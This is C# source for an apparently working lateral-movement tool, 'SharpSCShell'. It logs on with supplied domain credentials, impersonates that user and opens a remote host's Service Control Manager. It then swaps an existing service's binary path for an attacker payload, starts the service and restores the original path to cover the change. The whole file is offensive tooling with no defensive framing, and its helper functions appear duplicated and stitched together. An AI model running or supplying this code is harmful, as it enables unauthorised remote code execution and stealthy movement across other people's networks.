public SCManager(string serviceName)
{
if (scmHandle == IntPtr.Zero) {
scmHandle = OpenSCManager(null, null, ACCESS_MASK.GENERIC_READ);
if (scmHandle == IntPtr.Zero)
throw new ExternalException("Open Service Manager Error");
}
IntPtr svcHandle = OpenService(scmHandle, serviceName,
SERVICE_ACCESS.SERVICE_QUERY_CONFIG |
SERVICE_ACCESS.SERVICE_QUERY_STATUS);
if (svcHandle == IntPtr.Zero)
throw new ExternalException("Open Service Error");
uint bufSize = 0;
QueryServiceConfig(svcHandle, IntPtr.Zero, 0, out bufSize);
IntPtr qscsHandle = Marshal.AllocHGlobal((int)bufSize);
QueryServiceConfig(svcHandle, qscsHandle, bufSize, out bufSize);
qscs = (QueryServiceConfigStruct)Marshal.PtrToStructure(
qscsHandle, typeof(QueryServiceConfigStruct));
Marshal.FreeHGlobal(qscsHandle);
CloseServiceHandle(svcHandle);
}
public QueryService(IntPtr qscPtr)
{
QueryServiceConfigStruct qscs = new QueryServiceConfigStruct();
qscs = (QueryServiceConfigStruct)
Marshal.PtrToStructure(qscPtr,
new QueryServiceConfigStruct().GetType());
serviceInfo = new ServiceInfo();
serviceInfo.binaryPathName =
Marshal.PtrToStringAuto(qscs.binaryPathName);
serviceInfo.dependencies =
Marshal.PtrToStringAuto(qscs.dependencies);
serviceInfo.displayName =
Marshal.PtrToStringAuto(qscs.displayName);
serviceInfo.loadOrderGroup =
Marshal.PtrToStringAuto(qscs.loadOrderGroup);
serviceInfo.startName =
Marshal.PtrToStringAuto(qscs.startName);
serviceInfo.errorControl = qscs.errorControl;
serviceInfo.serviceType = qscs.serviceType;
serviceInfo.startType = qscs.startType;
serviceInfo.tagID = qscs.tagID;
Marshal.FreeCoTaskMem(qscPtr);
}
private static ServiceInfo GetServiceInfo(string ServiceName)
{
if (ServiceName.Equals(""))
throw new NullReferenceException("ServiceName must contain a valid service name.");
IntPtr sc_handle = OpenSCManager(null, null, STANDARD_RIGHTS_REQUIRED);
if (sc_handle.ToInt32() == 0)
throw new NullReferenceException();
IntPtr service = OpenService(sc_handle, ServiceName, SERVICE_QUERY_CONFIG);
if (service.ToInt32() <= 0)
throw new NullReferenceException();
int bytesNeeded = 5;
QueryServiceConfigStruct qscs = new QueryServiceConfigStruct();
IntPtr qscPtr = Marshal.AllocCoTaskMem(0);
int retCode = QueryServiceConfig(service, qscPtr, 0, ref bytesNeeded);
if (retCode == 0 && bytesNeeded == 0)
{
throw new Win32Exception();
}
else
{
qscPtr = Marshal.AllocCoTaskMem(bytesNeeded);
retCode = QueryServiceConfig(service, qscPtr, bytesNeeded, ref bytesNeeded);
if (retCode == 0)
{
throw new Win32Exception();
}
qscs.binaryPathName = IntPtr.Zero;
qscs.dependencies = IntPtr.Zero;
qscs.displayName = IntPtr.Zero;
qscs.loadOrderGroup = IntPtr.Zero;
qscs.startName = IntPtr.Zero;
qscs = (QueryServiceConfigStruct)
Marshal.PtrToStructure(qscPtr, new QueryServiceConfigStruct().GetType());
}
ServiceInfo serviceInfo = new ServiceInfo();
serviceInfo.binaryPathName = Marshal.PtrToStringAuto(qscs.binaryPathName);
serviceInfo.dependencies = Marshal.PtrToStringAuto(qscs.dependencies);
serviceInfo.displayName = Marshal.PtrToStringAuto(qscs.displayName);
serviceInfo.loadOrderGroup = Marshal.PtrToStringAuto(qscs.loadOrderGroup);
serviceInfo.startName = Marshal.PtrToStringAuto(qscs.startName);
serviceInfo.errorControl = qscs.errorControl;
serviceInfo.serviceType = qscs.serviceType;
serviceInfo.startType = qscs.startType;
serviceInfo.tagID = qscs.tagID;
Marshal.FreeCoTaskMem(qscPtr);
return serviceInfo;
}
static void Main(string[] args)
{
Console.WriteLine();
Console.WriteLine("=============== SharpSCShell --> Revised at Rcoil (C# version) =============== ");
Console.WriteLine();
if (args.Length < 2)
{
Console.WriteLine("SharpSCShell.exe target service payload domain username password");
Environment.Exit(0);
}
string target = args[0];
string ServiceName = args[1];
string payload = args[2];
string domain = args[3];
string username = args[4];
string password = args[5];
const int LOGON32_LOGON_NEW_CREDENTIALS = 9;
const int LOGON32_PROVIDER_DEFAULT = 0;
const uint SERVICE_NO_CHANGE = 0xffffffff;
const int SERVICE_DEMAND_START = 0x00000003;
const int SERVICE_ERROR_IGNORE = 0x00000000;
IntPtr phToken = IntPtr.Zero;
int bytesNeeded = 5;
Console.WriteLine("[*] Trying to connect to {0}", target);
bool bResult = false;
if (username != null)
{
Console.WriteLine("[*] Username was provided attempting to call LogonUser");
bResult = LogonUser(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, ref phToken);
if (!bResult)
{
Console.WriteLine("[!] LogonUser failed. Error:{0}", GetLastError());
Environment.Exit(0);
}
}
bResult = ImpersonateLoggedOnUser(phToken);
if (!bResult)
{
Console.WriteLine("[!] ImpersonateLoggedOnUser failed. Error:{0}", GetLastError());
Environment.Exit(0);
}
IntPtr SCMHandle = OpenSCManager(target, null, (uint)SCM_ACCESS.SC_MANAGER_ALL_ACCESS);
if (SCMHandle == IntPtr.Zero)
{
Console.WriteLine("[!] OpenSCManagerA failed! Error:{0}", GetLastError());
Environment.Exit(0);
}
Console.WriteLine("[*] SC_HANDLE Manager 0x{0}", SCMHandle);
Console.WriteLine("[*] Opening {0} Service ....", ServiceName);
IntPtr schService = OpenService(SCMHandle, ServiceName, ((uint)SERVICE_ACCESS.SERVICE_ALL_ACCESS));
Console.WriteLine("[*] SC_HANDLE Service 0x{0}", schService);
QueryServiceConfigStruct qscs = new QueryServiceConfigStruct();
IntPtr qscPtr = Marshal.AllocCoTaskMem(0);
int retCode = QueryServiceConfig(schService, qscPtr, 0, ref bytesNeeded);
if (retCode == 0 && bytesNeeded == 0)
{
Console.WriteLine("[!] QueryServiceConfig failed to read the service path. Error:{0}", GetLastError());
}
else
{
Console.WriteLine("[*] LPQUERY_SERVICE_CONFIGA need {0} bytes", bytesNeeded);
qscPtr = Marshal.AllocCoTaskMem(bytesNeeded);
retCode = QueryServiceConfig(schService, qscPtr, bytesNeeded, ref bytesNeeded);
qscs.binaryPathName = IntPtr.Zero;
qscs = (QueryServiceConfigStruct)Marshal.PtrToStructure(qscPtr, new QueryServiceConfigStruct().GetType());
}
string originalBinaryPath = Marshal.PtrToStringAuto(qscs.binaryPathName);
Console.WriteLine("[*] Original service binary path \"{0}\"", originalBinaryPath);
Marshal.FreeCoTaskMem(qscPtr);
bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, payload, null, null, null, null, null, null);
if (!bResult)
{
Console.WriteLine("[!] ChangeServiceConfigA failed to update the service path. Error:{0}", GetLastError());
Environment.Exit(0);
}
Console.WriteLine("[*] Service path was changed to \"{0}\"", payload);
bResult = StartService(schService, 0, null);
uint dwResult = GetLastError();
if (!bResult && dwResult != 1053)
{
Console.WriteLine("[!] StartServiceA failed to start the service. Error:{0}", GetLastError());
Environment.Exit(0);
}
else
{
Console.WriteLine("[*] Service was started");
}
bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, originalBinaryPath, null, null, null, null, null, null);
if (!bResult)
{
Console.WriteLine("[!] ChangeServiceConfigA failed to revert the service path. Error:{0}", GetLastError());
Environment.Exit(0);
}
else
{
Console.WriteLine("[*] Service path was restored to \"{0}\"", originalBinaryPath);
}
}
